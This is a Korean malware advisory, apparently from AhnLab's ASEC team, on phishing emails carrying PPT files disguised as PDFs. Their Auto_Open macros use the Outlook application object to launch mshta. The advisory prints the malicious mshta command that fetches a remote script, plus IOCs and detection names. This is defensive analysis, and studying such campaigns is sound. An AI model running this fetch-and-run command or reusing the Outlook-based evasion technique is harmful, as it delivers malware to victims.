Outlook.exe 를 이용한 악성 PPT 매크로 유포 중

최근 ASEC 분석팀은 꾸준하게 유포되고 있는 악성 PPT 파일의 변형을 확인하였다. 기존과 동일하게 mshta.exe 를 이용하여 악성 스크립트를 실행하는 동작 방식으로, 중간 과정에서 outlook.exe 프로세스를 이용하는 방식이 추가되었다.

악성 PPT 파일은 아래와 같이 피싱 메일의 첨부 파일을 통해 유포되고 있으며, 구매 문의와 관련된 내용을 포함하고 있다. 또한 이전 유형과 동일하게 악성 PPT 파일은 PDF 확장자로 위장한 것을 확인할 수 있다.

  • 유포 파일명

Purchase Inquiry_pdf.ppt

악성 PPT 파일이 첨부된 피싱 메일

악성 PPT 파일을 실행시, 매크로 포함 여부를 선택하는 알림이 생성되며 매크로 포함 버튼을 선택하게 되면 악성 매크로가 실행된다.

악성 매크로 실행

악성 매크로는 간단한 코드로 이루어져 있으며, Auto_Open() 함수에 의해 자동으로 실행되는 형태이다. 이번 변형에서 추가된 부분으로 CreateObject(“Outlook.Application”) 을 통해 Outlook 응용 프로그램 개체를 생성하여 mshta 명령어를 실행한다.

악성 매크로 (1)
악성 매크로 (2)

최종적으로 outlook 프로세스에 의해 mshta 가 실행되며, 아래의 그림은 자사 RAPIT 시스템에서 확인되는 프로세스 트리이다.

자사 RAPIT 시스템에서 확인되는 프로세스 트리

mshta 명령어는 기존과 동일하게 악성 스크립트가 포함된 Blogspot 웹페이지로 연결되는 형태이다. 현재는 해당 웹페이지가 삭제되어 추가 악성 행위는 알 수 없지만, 악성 스크립트에 따라 AgentTesla 등 다양한 악성코드가 실행될 수 있다.

  • 악성 명령어

“C:\Windows\System32\mshta.exe” “hxxp://www.bitly.com/hdjalsdnbhagdehasd”

  • Final URL

hxxps://orkyakroonmeinkyukartaahunthekat1.blogspot.com/p/charles123uuu.html

outlook.exe 프로세스를 통해 악성 명령어를 실행하는 방식의 변형은 행위 탐지를 우회하기 위한 목적으로 추정된다. 현재 V3 에서는 아래와 같이 행위 탐지가 가능한 것을 확인할 수 있다.

V3 행위 탐지

피싱 메일을 통해 유포되는 악성 PPT 파일은 작년부터 꾸준히 유포되고 있어 사용자들의 각별한 주의가 필요하다. 또한 출처가 불분명한 메일의 첨부파일은 열람을 자제해야하며, 문서에 포함된 의심 매크로는 실행하지 않도록 주의해야 한다.

[파일 진단]

  • Downloader/PPT.Generic

[행위 진단]

  • Execution/MDP.Mshta.M3815

[IOC 정보]

  • 0769e2f9ed19847d1195aa1f31e7ed4a
  • hxxp://www.bitly.com/hdjalsdnbhagdehasd
  • hxxps://orkyakroonmeinkyukartaahunthekat1.blogspot.com/p/charles123uuu.html

 [기존 악성 PPT 관련 블로그]

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

0 0 votes
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments